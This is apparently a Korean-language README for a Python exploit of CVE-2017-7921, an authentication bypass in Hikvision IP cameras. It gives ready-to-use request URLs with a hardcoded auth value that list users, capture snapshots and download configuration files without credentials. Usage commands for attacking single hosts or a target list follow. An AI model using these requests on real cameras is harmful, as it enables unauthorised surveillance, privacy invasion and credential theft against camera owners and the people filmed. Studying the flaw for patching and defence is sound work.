
CVE-2017-7921에 대한 Python 익스플로잇으로, Hikvision IP 카메라에서 인증 없는 사용자 열거, 스냅샷 캡처, 구성 파일 다운로드를 악성 HTTP 요청을 통해 수행합니다.
Hikvision 장치에서 부적절한 인증(Improper Authentication) 문제가 발견되었습니다.
부적절한 인증 취약점은 애플리케이션이 사용자를 적절하게 또는 올바르게 인증하지 않을 때 발생합니다.
이로 인해 악의적인 사용자가 시스템에서 자신의 권한을 상승시키고 민감한 정보에 접근할 수 있게 될 수 있습니다.
https://seclists.org/fulldisclosure/2017/Sep/23
취약점 세부 정보:
----------------------
모든 사용자 및 해당 역할 목록 검색:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
인증 없이 카메라 스냅샷 가져오기:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
그리고 가장 심각하게도, 카메라 구성을 다운로드할 수 있습니다:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
